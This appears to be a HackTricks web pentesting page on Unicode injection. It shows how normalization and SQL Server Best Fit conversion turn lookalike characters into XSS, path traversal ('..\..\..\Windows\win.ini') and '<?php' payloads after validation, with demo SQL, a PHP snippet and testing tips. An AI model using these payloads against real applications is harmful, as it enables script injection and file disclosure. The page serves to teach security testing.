overview.md (8885B)
1 --- 2 title: "Unicode Injection" 3 section: "Web Pentesting" 4 sectionSlug: "pentesting-web" 5 sourcePath: "src/pentesting-web/unicode-injection/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/unicode-injection/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Unicode Injection 14 15 ## Introduction 16 17 Depending on how the back-end/front-end behaves when it **receives weird Unicode characters**, an attacker might be able to **bypass protections and inject arbitrary ASCII metacharacters later**. The dangerous pattern is usually: 18 19 1. Input is validated in one representation 20 2. The application or database **implicitly converts / normalizes / re-encodes** it 21 3. The converted value becomes dangerous **after** validation 22 23 This can turn apparently harmless input into working payloads for **XSS, SQLi, path traversal/LFI, command injection, or logic bugs**. 24 25 ## Unicode normalization 26 27 Unicode normalization occurs when **Unicode characters are normalized to ASCII characters** or to another compatible representation. One common scenario is when the system **modifies** the user input **after checking it**. For example, in some languages a simple call to make the **input uppercase or lowercase** could normalize the given input and the **Unicode will be transformed into ASCII** generating new characters.<sup>[[6]](#references)</sup> 28 29 For more info check: 30 31 [Unicode Normalization](/hacktricks/pentesting-web/unicode-injection/unicode-normalization) 32 33 ## SQL Server Best Fit / implicit conversion 34 35 Microsoft SQL Server adds another dangerous post-validation transform: **implicit conversion from Unicode strings to narrow non-UTF code pages** (`char`, `varchar`, `text`, or non-Unicode string literals). Instead of rejecting unsupported characters, SQL Server can silently apply **Windows Best Fit mapping** and mutate Unicode lookalikes into ASCII metacharacters.<sup>[[1]](#references)[[2]](#references)</sup> 36 37 ### Dangerous conditions 38 39 Look for combinations such as: 40 41 - Columns using **`varchar` / `char` / `text`** 42 - Non-UTF collations / code pages such as CP1252 (`iso_1` in metadata) 43 - **Implicit conversion** from `nvarchar` to `varchar` 44 - Dynamic SQL using **non-Unicode literals** like `'payload'` instead of `N'payload'` 45 - Security-sensitive comparisons under **case-insensitive collations** such as `*_CI_*` 46 47 Useful recon queries: 48 49 ```sql 50 SELECT SERVERPROPERTY('Collation'); 51 SELECT DATABASEPROPERTYEX(DB_NAME(), 'Collation'); 52 53 SELECT 54 COLUMN_NAME, 55 DATA_TYPE, 56 CHARACTER_SET_NAME, 57 COLLATION_NAME 58 FROM INFORMATION_SCHEMA.COLUMNS 59 WHERE TABLE_NAME = 'target_table'; 60 ``` 61 62 ### Best Fit payload mutation 63 64 Example: **FULLWIDTH LESS-THAN SIGN** `<` (`U+FF1C`) can become ASCII `<` when inserted into a narrow column: 65 66 ```sql 67 CREATE TABLE worstfit_demo ( 68 narrow VARCHAR(20) COLLATE French_CI_AS, 69 wide NVARCHAR(20) COLLATE French_CI_AS 70 ); 71 72 INSERT INTO worstfit_demo VALUES (N'<', N'<'); 73 SELECT narrow, wide FROM worstfit_demo; 74 -- narrow => < 75 -- wide => < 76 ``` 77 78 This is not Unicode normalization in the standard sense; it is **Windows code-page Best Fit conversion** during SQL Server storage/conversion. 79 80 ### Non-Unicode literal pitfall 81 82 In SQL Server, `'text'` is a **non-Unicode literal by default**, even when inserted into an `NVARCHAR` column. Use the `N` prefix for wide strings: 83 84 ```sql 85 INSERT INTO t VALUES ('<'); -- converted before assignment 86 INSERT INTO t VALUES (N'<'); -- preserved in NVARCHAR, still mutated in VARCHAR 87 ``` 88 89 This matters in **stored procedures**, **dynamic SQL**, and any code path that concatenates attacker-controlled strings into SQL statements. 90 91 ### Stored XSS after DB storage 92 93 If an application filters classic ASCII XSS but accepts Unicode lookalikes, SQL Server can convert them into a valid payload **after insertion**: 94 95 ```sql 96 CREATE TABLE worstfitx ( 97 vary VARCHAR(50) COLLATE French_CI_AS 98 ); 99 100 INSERT INTO worstfitx VALUES (N'〈script〉alert(ʹxʹ)〈/script〉'); 101 SELECT vary FROM worstfitx; 102 -- <script>alert('x')</script> 103 ``` 104 105 This is especially interesting when the app: 106 107 - validates only before insert 108 - stores the payload in MSSQL 109 - later renders the **stored** value into HTML 110 111 ### Path traversal / LFI after DB storage 112 113 If filenames are stored in narrow MSSQL columns and later reused to build filesystem paths, Unicode dots and slash/backslash lookalikes can turn into traversal sequences: 114 115 ```sql 116 CREATE TABLE worstfity ( 117 id SMALLINT, 118 file_name VARCHAR(50) COLLATE French_CI_AS 119 ); 120 121 INSERT INTO worstfity 122 VALUES (45, N'..∖..∖..∖Windows∖win.ini'); 123 124 SELECT file_name FROM worstfity WHERE id = 45; 125 -- ..\..\..\Windows\win.ini 126 ``` 127 128 The filter may only see the Unicode version, while the application later consumes the **mutated** Windows path from the database. 129 130 ### `?` fallback reconstruction 131 132 When no Best Fit mapping exists, many Windows code pages fall back to `?`. This can reconstruct blocked syntax: 133 134 ```sql 135 INSERT INTO worstfitx VALUES (N'<ʭphp'); 136 SELECT vary FROM worstfitx; 137 -- <?php 138 ``` 139 140 Useful when `?` is blocked before storage but the DB later creates it. 141 142 ### Case-insensitive collation collisions 143 144 Default SQL Server collations are often case-insensitive, so equality and pattern matching can collide: 145 146 ```sql 147 SELECT IIF('abc' = 'ABC', 1, 0); -- 1 148 SELECT 'ok' WHERE 'abc' LIKE 'ABC'; -- ok 149 ``` 150 151 Don't assume usernames, API keys, role names, object IDs, or allow/deny-list checks are case-sensitive unless the relevant column/query uses a **binary or explicit case-sensitive collation**. 152 153 ### Offensive testing notes 154 155 - Try **fullwidth**, **modifier**, and other compatibility-like characters for `<`, `>`, `'`, `"`, `/`, `\`, `.`, `-`, `?` 156 - Compare **pre-insert** and **post-read** values, not only the reflected request 157 - Check whether the app uses **`VARCHAR` metadata + Unicode client input** 158 - Probe both `'payload'` and `N'payload'` 159 - Audit logic bugs caused by `*_CI_*` collations in addition to injection sinks 160 161 ## `\u` to `%` 162 163 Unicode characters are usually represented with the **`\u` prefix**. For example the char `㱋` is `\u3c4b` ([check it here](https://unicode-explorer.com/c/3c4B)). If a backend **transforms** the prefix **`\u` into `%`**, the resulting string will be `%3c4b`, which URL decoded is **`<4b`**. As you can see, a **`<` char is injected**. 164 165 You could use this technique to **inject any kind of char** if the backend is vulnerable. Check [https://unicode-explorer.com/](https://unicode-explorer.com/) to find the chars you need.<sup>[[3]](#references)</sup> 166 167 This vuln actually comes from a vulnerability a researcher found. For a more in-depth explanation check [https://www.youtube.com/watch?v=aUsAHb0E7Cg](https://www.youtube.com/watch?v=aUsAHb0E7Cg)<sup>[[4]](#references)</sup> 168 169 ## Emoji injection 170 171 Back-ends sometimes behave weirdly when they **receive emojis**. That's what happened in [this writeup](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209) where the researcher managed to achieve XSS with a payload such as `img src=x onerror=alert(document.domain)//`.<sup>[[5]](#references)</sup> 172 173 In that case, the server removed malicious characters and then **converted the UTF-8 string from Windows-1252 to UTF-8** (input/convert encoding mismatch). This did not immediately generate a proper `<`, just a weird Unicode quote-like character: `‹`. 174 175 Then the output was **converted again from UTF-8 to ASCII**. This second conversion normalized `‹` into `<`, making the payload executable: 176 177 ```php 178 <?php 179 $a = "<img src=x onerror=alert(document.domain)//"; 180 echo mb_convert_encoding($a, 'UTF-8', 'Windows-1252'); 181 # outputs: ‹img src=x onerror=alert(document.domain)// 182 183 # Then if the output is converted to ASCII: 184 echo iconv('UTF-8', 'ASCII//TRANSLIT', mb_convert_encoding($a, 'UTF-8', 'Windows-1252')); 185 # outputs: <img src=x onerror=alert(document.domain)// 186 ?> 187 ``` 188 189 ## References 190 191 - [1] [Synacktiv - The SQL Server Unicode problem: why your data might not be what you think it is?](https://synacktiv.com/en/publications/the-sql-server-unicode-problem-why-your-data-might-not-be-what-you-think-it-is.html) 192 - [2] [Orange Tsai / DEVCORE - WorstFit: Unveiling Hidden Transformers in Windows ANSI!](https://devco.re/blog/2025/01/09/worstfit-unveiling-hidden-transformers-in-windows-ansi/) 193 - [3] [Unicode Explorer](https://unicode-explorer.com/) 194 - [4] [Abusing unicode characters to PWN Intigriti XSS challenge](https://www.youtube.com/watch?v=aUsAHb0E7Cg) 195 - [5] [How I found an XSS vulnerability via using emojis](https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209) 196 - [6] [HackTricks - Unicode normalization](/hacktricks/pentesting-web/unicode-injection/unicode-normalization)